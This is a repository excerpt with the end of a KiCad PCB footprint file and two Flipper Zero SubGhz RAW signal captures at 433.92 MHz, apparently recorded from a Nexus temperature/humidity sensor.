209 | 210 | (uuid "bc9e14c1-34e2-41b5-89fb-1e0955d7cbc2") 211 | ) 212 | (pad "21" thru_hole oval (at 1.27 34.12) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 213 | 214 | (uuid "6ebe6fb6-3f3c-4784-8f4e-6c53ec036792") 215 | ) 216 | (pad "22" thru_hole oval (at 1.27 36.66) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 217 | 218 | (uuid "28629425-e3d0-40fa-a3df-031c404b405a") 219 | ) 220 | ) 221 | -------------------------------------------------------------------------------- /subghz/nexus-th/SubGHz_2024-12-04_13,22,38.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 5439 -100 1293 -64 22803 -1992 487 -1000 481 -1988 473 -2010 523 -1972 501 -2010 481 -2002 449 -2014 461 -1016 505 -1014 445 -2002 479 -1024 515 -1998 473 -1974 479 -1014 473 -2042 483 -3982 525 -1018 477 -1994 487 -1000 483 -1010 487 -1980 483 -1008 483 -1030 473 -2000 511 -2000 471 -1016 463 -1012 481 -1012 503 -986 509 -1012 475 -1000 507 -1018 485 -1998 487 -1980 481 -1008 485 -1000 517 -1988 463 -1008 505 -1972 469 -2004 513 -1998 485 -1990 459 -2000 479 -1992 487 -1000 481 -1010 487 -1994 487 -1010 513 -1966 517 -1976 471 -1034 481 -1988 487 -4000 531 -1020 477 -1974 499 -1012 465 -1012 479 -2006 481 -1020 479 -1010 491 -1982 513 -1966 513 -1004 485 -1010 483 -984 517 -992 481 -1010 487 -1002 515 -992 515 -1996 477 -2002 449 -1018 483 -1024 479 -2002 483 -992 481 -2004 483 -1984 519 -1982 469 -2002 487 -1972 485 -1992 489 -1004 475 -1012 503 -1992 465 -1010 509 -1996 485 -1996 459 -1040 477 -2012 491 -3994 521 -986 495 -2006 477 -1004 487 -1010 479 -1980 507 -978 509 -1008 473 -2010 487 -1998 473 -1010 497 -1010 479 -1016 487 -1014 487 -1010 483 -986 503 -1018 501 -2004 471 -1990 469 -1012 477 -1012 503 -1990 469 -1008 505 -1994 485 -1988 491 -1992 487 -1970 487 -2000 489 -1976 481 -1032 475 -988 505 -1974 481 -1016 531 -1968 483 -1998 481 -998 481 -2034 477 -3992 515 -992 481 -2002 481 -992 481 -1008 483 -2018 465 -1008 475 -1014 499 -1998 511 -1966 487 -1008 483 -1008 483 -1020 481 -1020 481 -1006 471 -1020 481 -1022 513 -2000 487 -1972 487 -1022 475 -1014 479 -1970 517 -990 479 -1994 485 -1998 489 -2008 487 -1966 481 -1996 487 -1978 481 -1010 483 -1030 481 -1990 491 -1008 513 -1988 459 -2000 481 -1006 507 -1974 527 -3992 497 -1024 479 -2004 485 -992 481 -1010 483 -1992 491 -1006 475 -1016 503 -1966 513 -1998 487 -1014 485 -1008 481 -1022 477 -1006 489 -1004 475 -1014 473 -1016 541 -1952 521 -1948 481 -1020 483 -1024 479 -2000 483 -994 483 -2000 487 -1996 489 -2010 485 -1968 481 -1990 487 -1990 501 -978 509 -1014 485 -1978 481 -1022 505 -1968 507 -1960 487 -1026 481 -2000 515 -3984 481 -1020 481 -1996 483 -994 483 -1008 483 -2014 483 -1004 475 -1018 471 -2002 511 -1998 471 -1014 467 -1012 477 -1012 503 -1020 477 -1014 481 -1010 471 -1032 513 -1962 507 -1974 489 -1006 473 -1004 497 -2004 479 -1010 459 -2010 479 -2004 483 -1996 485 -1996 487 -1966 503 -1974 479 -1018 501 -1008 463 -2004 473 -1040 497 -1972 501 -1962 483 -1034 473 -2008 511 -3974 541 -994 481 -1996 483 -994 513 -1002 475 -1976 509 -1012 475 -1000 473 -2010 523 -1966 505 -986 509 -1014 479 -1014 459 -1018 501 -980 511 -1016 7 | RAW_Data: 461 -1016 507 -1976 497 -1976 511 -1014 461 -1006 509 -1974 487 -1016 485 -1970 481 -1990 515 -1994 479 -1978 503 -1994 465 -2006 487 -1012 483 -1008 483 -1974 489 -1008 511 -1992 487 -1992 461 -1038 477 -2004 501 -3982 513 -1010 485 -1992 487 -1006 473 -1038 459 -2006 479 -1006 471 -1036 475 -2004 481 -2004 479 -1020 481 -1006 473 -1018 481 -1018 477 -1032 475 -986 519 -994 515 -2000 477 -1964 483 -1018 481 -1024 481 -1998 487 -996 481 -2000 483 -1986 521 -1976 489 -1970 487 -1996 489 -1980 481 -1012 485 -1000 479 -1998 487 -1000 517 -1994 487 -1996 483 -1006 481 -2010 509 -3970 503 -984 509 -1992 487 -996 479 -1010 487 -1982 481 -1010 481 -1018 483 -2016 493 -1982 481 -1010 485 -1032 481 -990 481 -1004 507 -1022 477 -1006 489 -1010 513 -1970 485 -2006 473 -1016 477 -1016 479 -1994 487 -998 481 -2000 483 -1990 487 -2014 487 -1968 487 -1996 489 -1964 481 -1042 447 -1032 471 -1994 481 -1042 483 -2008 477 -1972 487 -1016 491 -154684 65 -2356 197 -1448 163 -326 63 -66 165 -132 233 -598 297 -460 131 -330 265 -98 67 -100 331 -630 65 -564 295 -530 265 -166 167 -198 229 -130 97 -164 131 -66 327 -1028 63 -198 65 -198 99 -100 233 -134 131 -68 563 -100 99 -132 167 -132 199 -132 233 -698 231 -530 667 -660 265 -130 133 -132 131 -134 331 -466 65 -498 231 -332 299 -66 233 -66 199 -266 231 -694 65 -132 265 -66 131 -66 231 -132 99 -132 229 -426 195 -166 99 -200 67 -402 231 -202 233 -66 99 -364 363 -394 197 -534 429 -134 101 -166 497 -398 265 -166 163 -232 99 -100 97 -466 363 -66 99 -166 201 -134 65 -296 1425 -98 429 -100 997 -360 363 -98 97 -66 531 -98 365 -100 495 -66 463 -566 363 -328 231 -66 923 -98 129 -132 65 -296 495 -266 99 -266 267 -132 131 -166 65 -164 429 -132 199 -202 133 -132 133 -166 199 -100 231 -866 229 -134 65 -166 263 -886 263 -130 259 -198 325 -430 457 -66 99 -924 63 -166 97 -230 229 -396 65 -166 97 -166 67 -66 199 -564 397 -1424 199 -98 893 -100 65 -66 821 -164 493 -132 261 -396 97 -430 231 -168 299 -164 99 -66 327 -790 99 -632 299 -298 65 -694 97 -66 165 -198 67 -132 65 -134 65 -98 263 -198 65 -98 195 -130 295 -228 65 -98 65 -692 65 -132 101 -100 199 -298 165 -132 199 -102 697 -132 463 -266 263 -232 133 -964 231 -164 199 -134 99 -100 597 -98 927 -200 201 -166 197 -228 263 -164 227 -164 165 -132 131 -854 231 -98 229 -362 227 -132 395 -230 97 -196 525 -1024 131 -66 65 -130 163 -628 8 | RAW_Data: 131 -232 131 -98 295 -232 227 -164 227 -362 131 -132 391 -266 229 -132 425 -64 99 -132 663 -200 265 -100 267 -98 433 -264 131 -132 629 -232 565 -298 531 -130 97 -362 263 -162 263 -98 295 -132 129 -196 65 -98 165 -164 65 -196 129 -262 131 -100 267 -100 299 -134 459 -266 661 -166 165 -132 99 -68 2711 -466 231 -100 465 -198 229 -166 331 -68 165 -198 523 -100 597 -100 131 -200 65 -66 263 -232 231 -132 195 -198 361 -164 261 -162 65 -394 459 -166 427 -66 129 -460 595 -132 493 -98 97 -132 695 -132 131 -168 297 -166 197 -134 531 -332 595 -100 231 -330 263 -66 261 -132 399 -166 297 -164 1255 -164 261 -164 1513 -132 263 -66 161 -362 497 -66 99 -132 367 -232 333 -66 99 -200 231 -432 231 -168 65 -66 365 -266 229 -66 399 -98 297 -100 131 -266 395 -66 861 -296 297 -100 525 -266 65 -164 65 -196 457 -132 65 -296 555 -330 1349 -134 97 -198 991 -66 329 -100 63 -264 1291 -332 199 -66 133 -98 397 -66 331 -132 133 -166 367 -66 431 -134 461 -66 99 -66 99 -166 97 -400 859 -200 99 -166 131 -100 99 -464 263 -100 395 -132 431 -330 365 -100 65 -68 165 -200 299 -66 133 -98 495 -134 131 -200 231 -234 497 -298 297 -364 99 -66 1489 -164 65 -98 67 -98 133 -404 1031 -166 963 -230 295 -100 163 -66 131 -132 391 -66 493 -196 329 -98 163 -230 197 -328 199 -336 395 -66 97 -264 925 -66 165 -66 131 -426 263 -230 65 -132 757 -132 261 -132 197 -130 559 -658 99 -232 331 -100 131 -100 231 -164 791 -98 197 -296 1397 -98 397 -68 1001 -66 497 -496 97 -232 365 -134 65 -66 231 -66 131 -232 133 -132 301 -564 431 -362 429 -660 199 -166 995 -66 723 -64 131 -98 267 -66 67 -132 131 -266 131 -166 299 -132 433 -66 97 -98 197 -66 261 -98 165 -98 427 -132 97 -98 261 -166 821 -132 1623 -98 167 -366 233 -132 299 -68 131 -232 133 -166 763 -100 727 -232 131 -398 133 -198 531 -166 295 -198 433 -100 165 -132 497 -132 131 -264 131 -394 759 -100 167 -100 429 -334 365 -66 803 -134 167 -136 1525 -134 461 -302 329 -132 65 -100 431 -200 197 -68 265 -198 461 -132 133 -336 131 -166 97 -396 129 -66 65 -198 365 -100 133 -132 165 -66 165 -134 165 -134 163 -68 795 -166 131 -66 131 -300 333 -134 231 -100 299 -298 395 -364 227 -100 261 -130 325 -66 461 -298 459 -166 327 -66 99 -164 799 -134 133 -134 99 -66 663 -132 167 -132 599 -100 431 -100 431 -134 9 | RAW_Data: 433 -562 397 -132 63 -166 1023 -66 331 -364 331 -132 97 -230 65 -164 557 -66 197 -230 821 -198 431 -264 393 -266 231 -234 99 -200 833 -232 597 -200 795 -100 331 -66 331 -98 163 -266 231 -200 327 -230 163 -98 527 -232 195 -98 425 -98 295 -492 361 -230 199 -134 131 -130 263 -230 129 -132 195 -66 65 -100 1053 -98 361 -164 97 -64 427 -100 263 -134 329 -166 99 -400 427 -66 163 -230 163 -132 525 -198 623 -68 431 -268 333 -200 331 -66 167 -66 199 -234 231 -66 993 -66 163 -132 465 -66 823 -98 229 -100 197 -166 99 -166 827 -66 231 -100 231 -530 99 -396 231 -164 133 -166 165 -166 431 -230 131 -164 489 -66 459 -130 491 -66 131 -232 1197 -134 99 -234 165 -134 133 -66 131 -198 231 -326 591 -130 329 -164 165 -164 493 -330 163 -132 161 -132 99 -198 163 -362 63 -100 459 -360 327 -98 329 -262 1057 -66 459 -132 201 -66 1327 -300 165 -132 99 -132 463 -398 229 -98 99 -66 233 -100 399 -234 131 -268 99 -98 231 -166 299 -100 199 -166 431 -296 197 -332 163 -68 397 -302 131 -132 693 -434 561 -166 165 -200 265 -398 299 -66 463 -98 365 -198 759 -264 595 -68 165 -100 231 -266 231 -132 297 -164 165 -100 1261 -166 197 -228 131 -232 199 -166 99 -364 165 -100 163 -66 65 -100 99 -100 65 -232 99 -66 97 -100 165 -66 99 -166 165 -132 99 -132 99 -100 887 -100 97 -296 65 -66 295 -332 329 -298 99 -364 99 -166 167 -170 363 -68 497 -232 231 -98 565 -132 297 -298 431 -132 199 -234 163 -232 267 -266 431 -98 1029 -626 629 -66 133 -98 99 -264 233 -132 791 -132 261 -164 163 -164 65 -164 65 -132 263 -198 563 -100 199 -432 165 -232 65 -398 165 -132 923 -66 131 -234 197 -200 165 -66 329 -396 131 -230 591 -64 97 -100 97 -100 129 -264 197 -198 195 -130 129 -100 229 -98 163 -230 163 -66 97 -164 391 -164 129 -362 263 -66 795 -66 659 -232 561 -164 99 -164 327 -66 195 -66 329 -130 131 -362 2123 -296 663 -232 465 -66 163 -198 593 -66 97 -164 197 -98 561 -98 329 -66 621 -100 263 -66 195 -198 889 -132 293 -66 131 -132 97 -66 295 -164 491 -130 197 -98 97 -96 165 -298 97 -100 199 -166 629 -134 99 -198 429 -264 133 -66 133 -232 65 -100 263 -100 363 -200 697 -100 131 -134 163 -300 97 -68 97 -132 793 -528 495 -264 131 -132 365 -100 299 -232 163 -100 129 -294 229 -394 327 -166 197 -100 201 -100 197 -134 197 -200 359 -128 459 -132 10 | RAW_Data: 65 -66 687 -66 195 -66 227 -230 163 -164 129 -100 431 -166 167 -134 665 -66 435 -102 131 -100 131 -132 131 -132 163 -166 63 -758 327 -100 65 -98 493 -100 357 -66 295 -132 591 -100 459 -264 65 -98 165 -66 231 -66 129 -100 199 -100 363 -166 797 -100 165 -134 265 -100 297 -198 463 -266 663 -134 263 -300 597 -68 363 -166 65 -264 67 -132 265 -296 557 -66 131 -64 65 -232 529 -264 65 -66 363 -198 461 -330 197 -166 631 -132 99 -98 301 -132 431 -166 131 -230 727 -66 199 -66 463 -166 65 -166 165 -134 199 -264 233 -132 99 -100 363 -130 325 -100 259 -132 525 -66 197 -98 261 -166 197 -366 133 -302 99 -132 67 -332 131 -134 497 -166 231 -100 167 -136 369 -198 399 -200 263 -534 65 -68 65 -198 265 -100 263 -166 329 -134 99 -134 97 -134 99 -66 231 -66 231 -100 99 -166 265 -200 197 -132 165 -164 133 -98 431 -464 165 -134 99 -232 199 -628 431 -100 231 -132 101 -168 131 -134 331 -68 65 -100 99 -66 593 -132 99 -200 99 -132 595 -196 163 -100 197 -766 297 -432 199 -66 65 -98 197 -298 693 -298 465 -134 101 -268 331 -300 461 -166 97 -68 165 -100 97 -134 131 -132 133 -68 563 -296 431 -166 165 -100 131 -100 265 -198 199 -66 131 -98 163 -230 67 -132 65 -332 365 -100 331 -200 265 -100 265 -98 133 -100 99 -100 295 -66 233 -232 231 -134 65 -68 331 -198 99 -100 197 -134 393 -396 65 -100 657 -100 163 -98 263 -66 423 -66 65 -330 365 -164 165 -98 163 -66 923 -100 427 -68 165 -100 199 -272 199 -66 627 -166 259 -262 195 -194 65 -162 457 -362 263 -132 821 -198 193 -230 495 -164 817 -100 65 -200 199 -132 231 -66 861 -66 99 -132 165 -134 201 -132 463 -200 231 -100 463 -234 99 -166 131 -100 431 -132 261 -132 465 -166 131 -298 165 -100 163 -166 1027 -594 67 -164 731 -362 163 -100 133 -132 131 -100 463 -66 295 -230 131 -298 165 -132 231 -98 65 -264 227 -228 99 -130 99 -230 395 -66 367 -464 133 -100 133 -166 165 -166 133 -66 333 -264 493 -102 165 -332 133 -434 527 -200 365 -534 265 -494 231 -66 297 -132 99 -330 265 -528 195 -64 129 -232 99 -166 627 -166 795 -200 165 -336 131 -66 165 -166 133 -98 65 -230 97 -100 229 -164 97 -132 263 -198 99 -262 263 -398 131 -166 695 -132 99 -100 133 -266 431 -100 131 -100 165 -198 97 -100 823 -130 231 -132 263 -398 133 -132 233 -100 99 -198 65 -130 493 -328 529 -164 197 -98 11 | RAW_Data: 325 -228 295 -98 229 -100 427 -164 621 -132 327 -196 131 -100 99 -66 65 -200 131 -200 199 -98 297 -100 497 -166 133 -166 131 -168 99 -200 165 -134 231 -166 361 -394 593 -164 229 -98 293 -66 753 -460 99 -66 393 -562 757 -198 295 -66 361 -164 165 -164 593 -166 495 -100 233 -132 299 -366 295 -132 99 -66 497 -134 331 -100 459 -100 261 -164 97 -66 131 -394 65 -100 197 -66 459 -66 327 -132 691 -330 295 -328 163 -100 97 -66 625 -66 229 -66 63 -132 197 -166 229 -98 263 -230 97 -98 163 -166 457 -132 131 -132 1051 -66 399 -98 199 -100 399 -132 67 -198 165 -102 299 -166 1319 -132 167 -66 961 -66 263 -132 201 -200 265 -594 261 -398 563 -268 263 -434 65 -134 231 -168 265 -100 233 -100 167 -434 397 -198 591 -132 165 -132 691 -100 199 -236 233 -132 1089 -166 497 -100 197 -306 99 -166 763 -200 329 -334 97 -98 497 -298 933 -132 163 -66 131 -164 331 -232 561 -332 131 -132 163 -98 197 -66 363 -132 131 -96 99 -164 163 -164 231 -98 361 -264 165 -98 393 -100 97 -64 363 -66 265 -266 297 -100 461 -66 535 -166 97 -100 265 -198 231 -200 731 -164 99 -132 197 -66 233 -330 265 -432 97 -230 129 -394 429 -200 97 -198 63 -66 791 -66 753 -66 693 -198 135 -202 297 -334 261 -66 197 -198 753 -98 1153 -66 97 -264 97 -130 1705 -164 97 -198 959 -68 131 -332 99 -134 231 -134 763 -66 165 -232 165 -66 493 -66 163 -626 65 -230 397 -166 795 -66 395 -132 491 -332 431 -66 427 -198 199 -234 65 -166 795 -134 297 -100 65 -266 197 -334 163 -98 65 -164 129 -264 131 -98 163 -228 197 -822 131 -394 163 -228 261 -66 459 -232 791 -196 325 -68 65 -166 331 -134 995 -66 829 -100 763 -66 297 -200 67 -332 331 -164 12 | -------------------------------------------------------------------------------- /subghz/nexus-th/SubGHz_2024-11-26_13,20,14.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 563 -19896 131 -784 65 -266 197 -428 97 -132 65 -196 393 -66 163 -164 1289 -132 197 -66 751 -100 2477 -134 2541 -134 1889 -66 3755 -166 433 -132 2105 -132 887 -100 959 -102 1091 -66 165 -98 1151 -130 259 -98 755 -98 265 -168 1359 -66 5151 -68 261 -132 263 -166 1287 -100 363 -298 591 -66 1353 -68 953 -66 625 -132 763 -266 657 -98 1191 -132 259 -100 625 -66 1153 -132 1053 -132 965 -66 229 -100 301 -66 1169 -168 459 -134 603 -100 923 -164 1525 -166 1419 -200 231 -98 259 -66 691 -66 1975 -66 361 -132 1355 -66 2677 -66 1413 -132 67 -66 1219 -198 1249 -132 97 -66 263 -96 293 -100 533 -134 3021 -100 693 -66 363 -66 297 -64 761 -234 495 -234 231 -66 297 -134 925 -100 1359 -100 367 -130 525 -198 2753 -132 1927 -166 595 -132 1261 -66 463 -66 163 -132 393 -100 525 -100 499 -98 427 -198 229 -66 163 -128 1683 -66 231 -100 199 -66 799 -100 361 -98 229 -66 793 -66 333 -66 929 -98 329 -100 131 -98 561 -196 1157 -134 2187 -66 567 -68 1221 -66 621 -162 197 -328 1611 -134 823 -198 637 -132 229 -66 733 -134 925 -100 165 -100 595 -66 165 -100 559 -130 329 -130 361 -132 557 -66 1395 -200 729 -100 359 -98 261 -132 99 -134 1359 -98 623 -66 295 -166 1899 -166 1357 -166 657 -164 2029 -234 133 -98 165 -200 2195 -98 4641 -130 2011 -168 3313 -66 1993 -132 529 -234 1797 -66 461 -98 865 -100 2029 -134 201 -66 629 -166 887 -100 2237 -100 399 -166 365 -66 993 -66 2221 -98 299 -166 967 -100 265 -100 369 -66 1351 -200 197 -66 1589 -132 199 -66 725 -66 1159 -66 1115 -130 1649 -200 327 -66 259 -262 757 -66 161 -262 987 -398 763 -100 299 -66 961 -166 527 -98 1477 -66 229 -132 129 -98 1847 -132 493 -228 2043 -132 1357 -166 265 -100 1389 -298 859 -68 963 -98 199 -100 431 -66 265 -100 167 -100 827 -134 1429 -68 267 -66 1163 -66 467 -66 133 -68 365 -132 1121 -132 1729 -100 133 -66 199 -100 233 -134 197 -100 2031 -66 361 -68 231 -132 933 -462 531 -66 2693 -66 233 -98 2889 -102 535 -98 299 -100 1271 -166 639 -100 1749 -66 495 -66 1547 -64 195 -164 753 -100 1131 -234 529 -64 461 -66 1743 -132 267 -134 1331 -100 601 -268 297 -98 1263 -100 1045 -66 1121 -98 467 -66 197 -164 659 -66 131 -132 1449 -66 199 -132 367 -132 1731 -164 1057 -232 1183 -66 363 -164 65 -66 265 -98 1417 -132 327 -130 555 -230 263 -98 687 -100 395 -66 365 -232 819 -456 489 -98 423 -66 1279 -162 293 -100 625 -66 7 | RAW_Data: 493 -100 459 -100 165 -98 459 -66 995 -98 163 -98 3055 -132 1597 -132 497 -66 1929 -66 2815 -132 3033 -66 199 -134 4847 -66 1663 -66 963 -132 65 -132 795 -200 595 -132 229 -130 7881 -98 755 -66 1543 -66 1461 -66 2473 -68 2553 -100 5413 -66 433 -100 267 -166 899 -166 1365 -298 4099 -100 167 -100 297 -132 195 -66 197 -66 4853 -100 2145 -98 97 -132 1159 -66 227 -132 2469 -166 1879 -66 331 -66 397 -134 165 -66 2189 -66 161 -130 2215 -166 3023 -66 6265 -68 3939 -66 5221 -100 895 -98 2757 -264 2365 -66 431 -100 1229 -132 231 -98 10267 -64 2917 -98 1559 -66 6943 -164 557 -132 131 -98 3385 -66 1157 -234 935 -66 1127 -98 1189 -100 1197 -132 627 -66 65 -134 1233 -102 965 -100 4437 -198 97 -164 1157 -166 565 -66 1315 -164 1189 -98 1071 -68 2191 -134 467 -134 597 -134 131 -66 299 -364 265 -68 2263 -266 1291 -100 423 -230 427 -100 427 -100 331 -164 621 -132 2959 -66 65 -132 563 -66 367 -132 599 -134 1719 -66 231 -66 165 -100 2295 -68 987 -132 525 -66 885 -66 1291 -66 163 -100 393 -96 195 -262 1555 -132 531 -134 233 -66 1155 -168 1819 -132 491 -66 953 -100 619 -66 359 -98 359 -100 723 -66 261 -132 1015 -66 1241 -98 427 -98 819 -100 857 -166 399 -100 265 -234 933 -134 2731 -100 599 -98 267 -200 101 -164 629 -66 1029 -200 1225 -98 1081 -66 331 -200 599 -66 1029 -264 631 -100 1693 -66 331 -66 789 -64 881 -100 557 -430 1055 -66 493 -232 299 -66 1085 -262 263 -98 557 -66 293 -66 427 -100 1411 -132 65 -66 887 -164 5123 -68 331 -200 2787 -66 463 -98 2301 -96 821 -132 165 -168 333 -132 2117 -232 1261 -100 267 -100 1155 -64 295 -68 129 -132 1213 -96 489 -66 131 -164 393 -98 293 -194 263 -132 493 -132 199 -66 199 -100 1135 -100 467 -166 301 -100 695 -134 697 -66 329 -64 755 -68 203 -64 1283 -166 97 -100 2253 -68 999 -66 299 -100 1991 -100 593 -100 369 -232 199 -100 133 -200 265 -166 495 -100 763 -166 999 -66 65 -100 701 -68 399 -134 987 -130 931 -66 425 -66 229 -98 327 -98 1319 -68 1153 -66 761 -134 1029 -98 133 -98 299 -66 297 -134 697 -166 133 -98 199 -132 303 -66 661 -200 525 -132 229 -196 261 -66 65 -100 393 -166 2119 -96 355 -134 295 -100 1117 -130 227 -162 395 -98 1365 -102 367 -100 495 -66 333 -132 1093 -134 301 -68 665 -100 163 -68 1359 -98 365 -134 471 -198 261 -64 231 -130 1023 -132 1389 -130 165 -164 457 -164 459 -66 1577 -164 193 -98 523 -132 8 | RAW_Data: 195 -132 133 -102 631 -68 13839 -64 3281 -66 3155 -132 1543 -66 2613 -100 165 -98 197 -164 6835 -66 465 -132 633 -66 2195 -132 1649 -66 365 -98 4145 -66 193 -196 2061 -98 815 -64 2429 -66 165 -64 197 -132 653 -164 1707 -66 2225 -132 229 -98 2243 -66 6507 -100 1393 -166 3623 -100 231 -132 131 -130 231 -132 195 -130 1117 -100 819 -64 829 -100 567 -200 1225 -134 2155 -132 1677 -164 7451 -100 131 -166 4411 -100 631 -166 1125 -134 5205 -66 367 -100 1791 -64 1551 -134 2787 -100 365 -132 791 -100 195 -264 4295 -66 1447 -164 929 -168 4837 -68 2775 -132 1611 -132 1697 -100 431 -100 531 -134 399 -98 1261 -132 1753 -68 529 -68 565 -166 363 -66 433 -166 337 -166 165 -132 331 -100 365 -300 1293 -68 65 -66 999 -132 133 -66 197 -68 331 -66 531 -132 729 -164 493 -68 231 -68 133 -100 959 -164 1389 -132 567 -234 431 -134 231 -166 527 -134 363 -100 301 -166 763 -66 1263 -66 891 -100 461 -66 199 -100 895 -132 295 -64 663 -100 331 -100 795 -66 165 -66 99 -132 399 -66 361 -66 229 -100 229 -98 261 -100 1647 -132 233 -66 197 -130 753 -130 229 -130 1057 -66 465 -234 621 -198 889 -98 2311 -166 827 -100 1945 -196 97 -66 987 -68 3375 -100 931 -98 899 -132 603 -168 231 -100 763 -200 299 -100 459 -98 459 -164 327 -98 299 -100 99 -130 325 -100 197 -66 361 -132 951 -164 263 -198 227 -100 427 -98 561 -232 297 -66 623 -96 1217 -98 131 -164 757 -264 1195 -100 593 -228 1019 -198 261 -98 361 -66 265 -198 99 -98 2847 -168 231 -164 133 -132 267 -68 793 -132 1523 -166 199 -68 365 -66 1461 -66 597 -166 1857 -66 659 -132 97 -98 393 -196 195 -66 591 -164 789 -166 97 -132 131 -202 599 -168 929 -132 233 -66 467 -66 99 -100 1629 -66 563 -134 533 -166 263 -66 563 -132 361 -100 429 -166 467 -66 1027 -134 301 -98 685 -234 131 -198 99 -100 299 -200 131 -100 429 -166 663 -66 1293 -100 333 -166 529 -66 433 -66 329 -164 559 -134 261 -98 1257 -98 1033 -68 265 -100 1095 -102 1325 -66 199 -100 1035 -166 397 -132 497 -66 861 -132 263 -100 1921 -132 1127 -100 531 -166 233 -98 167 -64 795 -66 299 -330 231 -262 1915 -166 727 -132 1317 -68 731 -66 1033 -98 433 -68 2031 -364 4239 -200 329 -166 1511 -132 727 -64 821 -198 229 -66 1217 -66 533 -132 499 -300 663 -134 65 -100 499 -268 399 -68 497 -132 99 -98 559 -66 595 -166 399 -332 97 -232 893 -68 397 -164 895 -100 99 -66 163 -132 295 -130 9 | RAW_Data: 923 -98 597 -66 131 -98 99 -166 825 -66 817 -66 657 -66 5431 -100 731 -66 621 -66 655 -98 1817 -66 133 -100 197 -100 631 -66 1261 -134 529 -100 5777 -98 853 -66 463 -132 365 -68 569 -98 265 -168 829 -68 265 -168 2043 -98 657 -100 863 -100 533 -98 2057 -166 1621 -98 229 -64 1189 -100 199 -166 563 -68 6371 -66 759 -66 531 -66 363 -68 465 -68 131 -166 165 -68 3383 -66 863 -66 2203 -98 1227 -66 1725 -132 531 -134 133 -100 1331 -100 1161 -100 365 -66 2619 -134 397 -100 9803 -68 229 -100 721 -100 425 -66 1049 -66 531 -100 727 -100 1293 -68 893 -98 361 -66 595 -98 1793 -66 1421 -66 863 -168 233 -66 1465 -198 4757 -260 721 -264 329 -66 4603 -66 755 -98 2675 -68 433 -100 2323 -166 1129 -234 861 -66 935 -66 131 -134 395 -66 2967 -98 621 -66 529 -66 469 -100 401 -100 1349 -66 129 -100 391 -68 1349 -264 231 -234 297 -132 227 -98 197 -66 163 -298 1147 -100 595 -164 655 -66 227 -66 491 -130 65 -132 227 -98 425 -100 461 -100 233 -132 995 -132 3359 -300 231 -132 431 -66 1363 -164 1093 -166 299 -198 63 -66 97 -66 691 -164 1415 -166 295 -100 623 -66 595 -132 491 -66 99 -64 165 -164 131 -66 1193 -68 499 -66 365 -100 297 -100 325 -100 265 -166 535 -132 65 -66 263 -234 563 -134 1453 -66 467 -100 529 -102 727 -100 165 -68 665 -66 1367 -166 363 -100 563 -132 2147 -132 395 -164 395 -132 99 -166 961 -68 463 -66 1991 -98 331 -132 535 -296 729 -100 231 -100 957 -98 623 -98 623 -262 423 -132 195 -64 395 -98 99 -66 695 -100 131 -98 1261 -66 565 -66 1355 -166 2239 -198 657 -98 359 -100 163 -66 195 -98 1089 -68 529 -134 231 -66 601 -100 265 -166 401 -102 399 -66 1259 -66 231 -166 425 -164 395 -200 197 -100 431 -66 395 -132 629 -232 397 -134 461 -100 465 -332 923 -264 327 -134 393 -134 2721 -230 397 -100 233 -134 1159 -66 861 -132 331 -98 231 -66 399 -98 229 -132 983 -164 1051 -130 589 -132 855 -134 333 -132 495 -500 697 -132 495 -166 1555 -66 1055 -66 591 -66 663 -98 295 -66 1111 -66 2193 -132 1019 -198 161 -198 757 -66 99 -198 297 -166 199 -66 99 -166 297 -98 497 -66 299 -66 163 -100 1393 -66 2091 -66 99 -164 565 -234 263 -66 789 -66 261 -66 425 -132 457 -132 297 -132 1577 -66 1447 -66 759 -66 261 -64 493 -132 863 -166 199 -100 99 -66 731 -132 293 -166 197 -266 197 -132 1711 -98 361 -66 227 -98 361 -66 227 -164 161 -98 10 | RAW_Data: 427 -100 833 -100 299 -232 359 -100 1691 -66 65 -102 233 -200 297 -68 365 -166 4481 -100 5657 -66 499 -166 1527 -100 1785 -68 1257 -66 1059 -66 229 -130 3043 -66 1641 -66 6293 -130 1427 -66 399 -66 827 -100 599 -166 1129 -66 197 -134 297 -100 797 -66 99 -132 3833 -100 1225 -132 1031 -66 833 -68 665 -132 929 -66 293 -66 883 -66 521 -66 327 -66 1873 -130 3021 -100 229 -100 1551 -262 459 -98 197 -100 629 -100 1093 -100 1523 -66 1987 -100 265 -66 1031 -132 1529 -100 725 -228 1087 -164 1893 -66 1891 -98 697 -100 1353 -66 1579 -66 401 -68 629 -100 799 -66 1395 -100 4021 -198 693 -66 631 -68 3381 -100 301 -66 1065 -132 1191 -132 423 -66 4469 -100 399 -66 395 -98 559 -228 1185 -66 4045 -198 399 -166 1381 -21658 329 -434 133 -266 129 -338 331 -234 893 -200 67 -132 1121 -66 953 -166 235 -200 297 -100 563 -68 565 -134 463 -66 359 -64 923 -166 623 -162 621 -98 593 -66 759 -132 1097 -100 201 -134 465 -66 629 -66 431 -100 1459 -100 331 -132 865 -100 199 -134 99 -66 989 -164 785 -98 163 -66 131 -132 823 -132 857 -100 1233 -66 1457 -198 265 -66 297 -66 561 -98 97 -164 391 -66 1231 -132 295 -64 459 -66 361 -66 753 -132 163 -458 631 -166 295 -98 163 -132 389 -132 555 -230 625 -98 555 -98 359 -164 397 -200 2419 -98 361 -66 531 -132 853 -66 1781 -66 963 -100 427 -132 65 -164 2159 -68 565 -132 65 -100 663 -66 65 -100 563 -132 165 -166 197 -566 429 -66 2865 -100 721 -198 97 -98 261 -194 879 -166 391 -130 195 -166 427 -66 1377 -64 555 -66 329 -98 519 -98 295 -96 129 -100 197 -134 567 -98 431 -232 65 -100 297 -134 363 -132 231 -100 959 -364 165 -64 563 -134 863 -100 131 -66 231 -66 365 -66 861 -132 399 -66 465 -66 299 -168 197 -198 229 -66 459 -66 859 -100 363 -66 265 -68 1157 -130 931 -100 1505 -162 755 -132 161 -98 1015 -132 1087 -66 199 -164 659 -132 199 -98 1221 -98 129 -66 1543 -98 661 -262 791 -132 197 -196 65 -132 987 -130 359 -98 297 -66 297 -100 755 -98 263 -66 723 -264 821 -100 459 -100 229 -98 425 -100 1017 -264 755 -100 295 -66 227 -98 395 -166 331 -132 231 -134 331 -198 129 -98 63 